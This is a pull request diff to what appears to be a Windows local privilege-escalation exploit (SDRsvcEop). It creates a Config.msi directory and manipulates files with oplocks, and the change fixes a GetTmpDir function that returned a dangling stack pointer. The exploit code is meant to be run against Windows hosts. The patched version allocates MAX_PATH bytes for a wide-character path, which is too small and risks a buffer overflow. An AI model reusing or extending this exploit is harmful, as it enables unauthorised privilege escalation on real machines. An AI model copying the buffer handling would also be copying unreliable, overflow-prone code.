### PR TITLE
bug fixed about invalid GetTmpDir function return value due to local …

### DIFF
--- a/v2/SDRsvcEop/def.h
+++ b/v2/SDRsvcEop/def.h
@@ -76,7 +76,7 @@ void cb1();
 BOOL Trigger();
 VOID Fail();
 DWORD WINAPI install(void*);
-LPWSTR GetTmpDir();
+VOID GetTmpDir(LPWSTR dir);
 BOOL Move(HANDLE);
 VOID FindFile(HANDLE hDir);
 LPWSTR BuildPath(LPCWSTR path);

--- a/v2/SDRsvcEop/main.cpp
+++ b/v2/SDRsvcEop/main.cpp
@@ -27,7 +27,9 @@ int wmain(int argc, wchar_t** argv)
         return 1;
     }
     printf("[+] Config.msi directory created!\n");
-    dir = GetTmpDir();
+    dir = (LPWSTR)malloc(MAX_PATH);
+    ZeroMemory(dir, MAX_PATH);
+    GetTmpDir(dir);
     printf("[*] Directory: %ls\n", dir);
     if (!CreateDirectory(dir, NULL)) {
         printf("[!] Cannot create %ls directory!\n", dir);
@@ -314,7 +316,7 @@ VOID FindFile(HANDLE hDidr) {
         delete oplock;
     }
 }
-LPWSTR GetTmpDir() {
+VOID GetTmpDir(LPWSTR dir) {
     LPWSTR username;
     DWORD szUsername = 0;
     WCHAR path[MAX_PATH] = { 0x0 };
@@ -327,8 +329,7 @@ LPWSTR GetTmpDir() {
     username = (LPWSTR)malloc(szUsername);
     GetUserName(username, &szUsername);
     swprintf(path, L"C:\\users\\%s\\appdata\\local\\temp\\%s", username, str_uuid);
-
-    return path;
+    StrCatW(dir, path);
 }
 HANDLE myCreateDirectory(LPWSTR file, DWORD access, DWORD share, DWORD dispostion) {
     UNICODE_STRING ufile;


### PR DESCRIPTION
…variable memory was release when call stack dead
Don't alloc local variable and return it during  inside method body.